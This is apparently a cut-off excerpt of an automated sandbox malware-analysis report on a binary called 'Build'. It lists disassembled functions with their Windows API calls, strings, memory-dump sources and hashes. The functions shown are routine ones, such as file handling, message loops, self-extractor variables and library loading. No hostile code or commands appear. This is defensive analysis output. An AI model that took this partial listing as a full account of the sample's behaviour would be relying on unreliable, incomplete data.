Part of subcall function 00B528AB: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B528D4
Part of subcall function 00B528AB: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B51309,Crypt32.dll,00000000,00B51383,00000200,?,00B51366,00000000,00000000,?), ref: 00B528F4

GetProcAddress.KERNELBASE(00000000,CryptProtectMemory), ref: 00B51315
GetProcAddress.KERNEL32(00B8C1F0,CryptUnprotectMemory), ref: 00B51325

Strings

CryptProtectMemory, xrefs: 00B5130F
CryptUnprotectMemory, xrefs: 00B5131B
Crypt32.dll, xrefs: 00B512FF

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: 520052b447231495bdb7801a2310dc854e5f7ca18cba2ecc931673954037c906
Instruction ID: c260b6dabd33d40dbf76326fd8a430aff3a52d07ca9041bf4054ea35278a48de
Opcode Fuzzy Hash: 520052b447231495bdb7801a2310dc854e5f7ca18cba2ecc931673954037c906
Instruction Fuzzy Hash: 04E08670A51F01AED7305F7899497427FE49F24711F04CCEDE4ED93550DAB4D4888B10

Function 00B4B2B0 Relevance: 7.6, APIs: 5, Instructions: 119
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00B48846,?,00000005), ref: 00B4B342
GetLastError.KERNEL32(?,?,00B48846,?,00000005), ref: 00B4B34F
CreateFileW.KERNEL32(?,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00B48846,?,00000005), ref: 00B4B382
GetLastError.KERNEL32(?,?,00B48846,?,00000005), ref: 00B4B38A
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00B48846,?,00000005), ref: 00B4B3D9

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: fe9e4431cde2678b2374546f8dc67ac66684251be6b35bc486bbc2ff706f2e45
Instruction ID: 55cd6f3521155bd3333a1209f5e53ec04bced951641468f53471f6043ea0e432
Opcode Fuzzy Hash: fe9e4431cde2678b2374546f8dc67ac66684251be6b35bc486bbc2ff706f2e45
Instruction Fuzzy Hash: A8414670948745AFD320DF25CC85FAABBD8FB44320F100A59FAA5972C1D7B0EA48DB95

Function 00B5D864 Relevance: 7.5, APIs: 5, Instructions: 38
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B5D875
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B5D886
IsDialogMessageW.USER32(0002043C,?), ref: 00B5D89A
TranslateMessage.USER32(?), ref: 00B5D8A8
DispatchMessageW.USER32(?), ref: 00B5D8B2

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: f976606015c3336dbfa6dc9308f385c0c92066b16819a9df77fcbbbc6aef7e63
Instruction ID: 3e7fd4c9e48fa6801afd3f7154145248873234aff8c3b296105f3bf8ef1d8030
Opcode Fuzzy Hash: f976606015c3336dbfa6dc9308f385c0c92066b16819a9df77fcbbbc6aef7e63
Instruction Fuzzy Hash: ACF03071905219ABDB30ABE5DC0DEDB7FBCEE062517004150B906D3010EF34D509C7B0

Function 00B5CB49 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 00B5CB6A
SHAutoComplete.SHLWAPI(?,00000010), ref: 00B5CBA1

Part of subcall function 00B54168: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,00B4E084,00000000,.exe,?,?,00000800,?,?,?,00B5AD5D), ref: 00B5417E

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00B5CB91

Strings

EDIT, xrefs: 00B5CB75, 00B5CB80, 00B5CB8D

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: 2890ec7eedac3065c665bfd47630b12a82309d352aefd7b7a79a7d2d610e31f7
Instruction ID: 8f0e21512c078b01d4799fe5de11e9a5be7002d1b8b55bbc882f7c6404570c58
Opcode Fuzzy Hash: 2890ec7eedac3065c665bfd47630b12a82309d352aefd7b7a79a7d2d610e31f7
Instruction Fuzzy Hash: 44F0A432A45318BFDB209B258C07F9F7BECDF86701F010095BD05B7180DE709D058AA5

Function 00B5FFDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00B5FFFE
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00B60038

Strings

sfxpar, xrefs: 00B60033
sfxcmd, xrefs: 00B5FFF9

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: 02760a6316df08999891ac0bd2517a91d0b7373b40228378cd2de02efce103c2
Instruction ID: 2d3fe8f060de537499e2db75cd1585f3d1b2fede7c42c4af2f5825304e00c4e2
Opcode Fuzzy Hash: 02760a6316df08999891ac0bd2517a91d0b7373b40228378cd2de02efce103c2
Instruction Fuzzy Hash: C3F0F671911228ABD720AF958C09AAFB3DCEF1DB4174044D6BD46A7281DEB89D80CBA5

Function 00B66232 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000011,00000000,00000800,?,00B661E3,00000000,00000001,00BA60C8,?,?,?,00B66386,00000004,InitializeCriticalSectionEx,00B79624,InitializeCriticalSectionEx), ref: 00B6623F
GetLastError.KERNEL32(?,00B661E3,00000000,00000001,00BA60C8,?,?,?,00B66386,00000004,InitializeCriticalSectionEx,00B79624,InitializeCriticalSectionEx,00000000,?,00B6613D), ref: 00B66249
LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,00B65083), ref: 00B66271

Strings

api-ms-, xrefs: 00B66256

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: d810ce0714ffe4401f49f1f225832815d6180d6a3a41be3a2dc3bb3b05491e68
Instruction ID: 8770ea3afea03b90bc350d11f9d61ac81005d279d561b13e22ee250618531b06
Opcode Fuzzy Hash: d810ce0714ffe4401f49f1f225832815d6180d6a3a41be3a2dc3bb3b05491e68
Instruction Fuzzy Hash: 3FE0BF30A80705B7EF111F61EC56F593FA5EB11B51F144060F91DA90F1DFA999A09A84

Function 00B4B151 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6,?,?,?,00000000,00B4B662,?,?,00000000,?,?), ref: 00B4B161
ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,00B4B662,?,?,00000000,?,?), ref: 00B4B179
GetLastError.KERNEL32(?,?,?,00000000,00B4B662,?,?,00000000,?,?), ref: 00B4B1AB
GetLastError.KERNEL32(?,?,?,00000000,00B4B662,?,?,00000000,?,?), ref: 00B4B1CA

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 78fc58781153cfb6c549aa230e2b2526d7d5ef8f25a0739ef584683fb904d77c
Instruction ID: bdf332b956d8d9bbef1205116d705a14adcb3993865da9bdd3a9ad42a8bcf582
Opcode Fuzzy Hash: 78fc58781153cfb6c549aa230e2b2526d7d5ef8f25a0739ef584683fb904d77c
Instruction Fuzzy Hash: D2118230924604EBDF215F20CC64E6937E9FB453A1F1046AAFA16A5290DB70DF84FB51

Function 00B6D384 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00B6688D,00000000,00000000,?,00B6D32B,00B6688D,00000000,00000000,00000000,?,00B6D528,00000006,FlsSetValue), ref: 00B6D3B6
GetLastError.KERNEL32(?,00B6D32B,00B6688D,00000000,00000000,00000000,?,00B6D528,00000006,FlsSetValue,00B7AC00,FlsSetValue,00000000,00000364,?,00B6BA77), ref: 00B6D3C2
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00B6D32B,00B6688D,00000000,00000000,00000000,?,00B6D528,00000006,FlsSetValue,00B7AC00,FlsSetValue,00000000), ref: 00B6D3D0

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: c1291cbda7ea9273d340d83c4da9ecda83aaa9111b5449da335b64aec30b0846
Instruction ID: 989e7b89e49229ffb90f577fbe7958cc03c730e3b95a4c57cd087853df0a1361
Opcode Fuzzy Hash: c1291cbda7ea9273d340d83c4da9ecda83aaa9111b5449da335b64aec30b0846
Instruction Fuzzy Hash: BC01F232B51726ABCB214F69AC84A577BD8FF05BA17250664F91ED7380CF28D8408AE5

Function 00B5136B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00B512F6: GetProcAddress.KERNELBASE(00000000,CryptProtectMemory), ref: 00B51315
Part of subcall function 00B512F6: GetProcAddress.KERNEL32(00B8C1F0,CryptUnprotectMemory), ref: 00B51325

GetCurrentProcessId.KERNEL32(?,00000200,?,00B51366), ref: 00B513F9

Strings

CryptProtectMemory failed, xrefs: 00B513B0
CryptUnprotectMemory failed, xrefs: 00B513F1

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: 50ec9eaa3cd2711bb56916f5d41fc94cc1fef5e4c326933551bd539a2d0d5a13
Instruction ID: 81c146a2e0c6cd9bcc83cafa827fdaad8adb8f16a37727019b62885785e40134
Opcode Fuzzy Hash: 50ec9eaa3cd2711bb56916f5d41fc94cc1fef5e4c326933551bd539a2d0d5a13
Instruction Fuzzy Hash: 33113331600624ABDB15AB289C85B6E3BE8EF00B21B0085E6FC116B262DF309D85CBD4

Function 00B53105 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00010000,Function_00013240,?,00000000,?), ref: 00B53129
SetThreadPriority.KERNEL32(00000000,00000000), ref: 00B53170

Part of subcall function 00B47BAD: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B47BD5

Strings

CreateThread failed, xrefs: 00B53135

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: bc962f8b752967ae287735299e63b056b525d3f90f15000b9d2001a988ed76bc
Instruction ID: 7c81af79f98555962cb6452b8c457c44011225950d2b32098d2d437434c24337
Opcode Fuzzy Hash: bc962f8b752967ae287735299e63b056b525d3f90f15000b9d2001a988ed76bc
Instruction Fuzzy Hash: A701DBB5248B066FD3207F609C81F6677D8EB41B52F1001EEFA456B2D0CEA16945C764

Function 00B4B9BA Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,?,?,?,00B4F306,00000001,?,?,?,00000000,00B57564,?,?,?,?), ref: 00B4B9DE
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00B4BA25
WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00B4F306,00000001,?,?,?), ref: 00B4BA51

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: b6467d893b1be5eefcb7ea993bbc86a23c7a0ce639b566f1728f4cbbb27a9485
Instruction ID: 8e7012ab344fb155a2383f876fedb4a4f5e68cf9b21d0cfbfeb707665ebbd287
Opcode Fuzzy Hash: b6467d893b1be5eefcb7ea993bbc86a23c7a0ce639b566f1728f4cbbb27a9485
Instruction Fuzzy Hash: D631BC31248305AFDB14CF24D848F6A77E5EB81715F000A5DFA816B290CF74DE88DBA2

Function 00B4BEE1 Relevance: 4.6, APIs: 3, Instructions: 61COMMON

Download Yara Rule

APIs

Part of subcall function 00B4E1EC: _wcslen.LIBCMT ref: 00B4E1F2

CreateDirectoryW.KERNELBASE(?,00000000,?,?,00000000,00B4BBD0,?,00000001,00000000,?,?), ref: 00B4BF12
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,00000000,00B4BBD0,?,00000001,00000000,?,?), ref: 00B4BF45
GetLastError.KERNEL32(?,?,?,00000000,00B4BBD0,?,00000001,00000000,?,?), ref: 00B4BF62

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: CreateDirectory$ErrorLast_wcslen
String ID:
API String ID: 2260680371-0
Opcode ID: 6eae95561625d436c03c30926270ca04dbe8163fadd573eeec301ac5b649c4da
Instruction ID: 7e1169806a743224c07b451182fd070ecc3bff6964e2ed36f1f260a7f6164575
Opcode Fuzzy Hash: 6eae95561625d436c03c30926270ca04dbe8163fadd573eeec301ac5b649c4da
Instruction Fuzzy Hash: F811A031200214AADF15AB748C45FFE73D8DF09700F0448D4FB09D7191DB68DF8AAA65

Function 00B6DEE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00B6DF08

Strings

, xrefs: 00B6DF4D

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 23dbdacd7be92890ecc396ffeabba533b6d7acaa5a4771255fd1ce650e53b43a
Instruction ID: 7773754402b8eaf747124480536055f5845ae41d5ed84495df36bd374db2fe70
Opcode Fuzzy Hash: 23dbdacd7be92890ecc396ffeabba533b6d7acaa5a4771255fd1ce650e53b43a
Instruction Fuzzy Hash: DA412974A043889FDF228F248C85BF6BBEAEF55304F1404ECE59E87142D279AA45CF60

Function 00B6D5BC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,62E85006,00000001,?,000000FF), ref: 00B6D62D

Strings

LCMapStringEx, xrefs: 00B6D5CD, 00B6D5D7

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: da56e6ca775be881f972a1c1957a5ef3ceda3efeb16fedd034ea726916b1bc14
Instruction ID: a81cf2ddcabeb65eb197a664326f2ce659debcd191c5d2643ed9ef3a9963cb14
Opcode Fuzzy Hash: da56e6ca775be881f972a1c1957a5ef3ceda3efeb16fedd034ea726916b1bc14
Instruction Fuzzy Hash: 36014832A00208BBCF025FA0DD02DEE7FA2EF4C710F018194FE1826171CA768971EB91

Function 00B6D55A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00B6CBBF), ref: 00B6D5A5

Strings

InitializeCriticalSectionEx, xrefs: 00B6D56B, 00B6D575

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
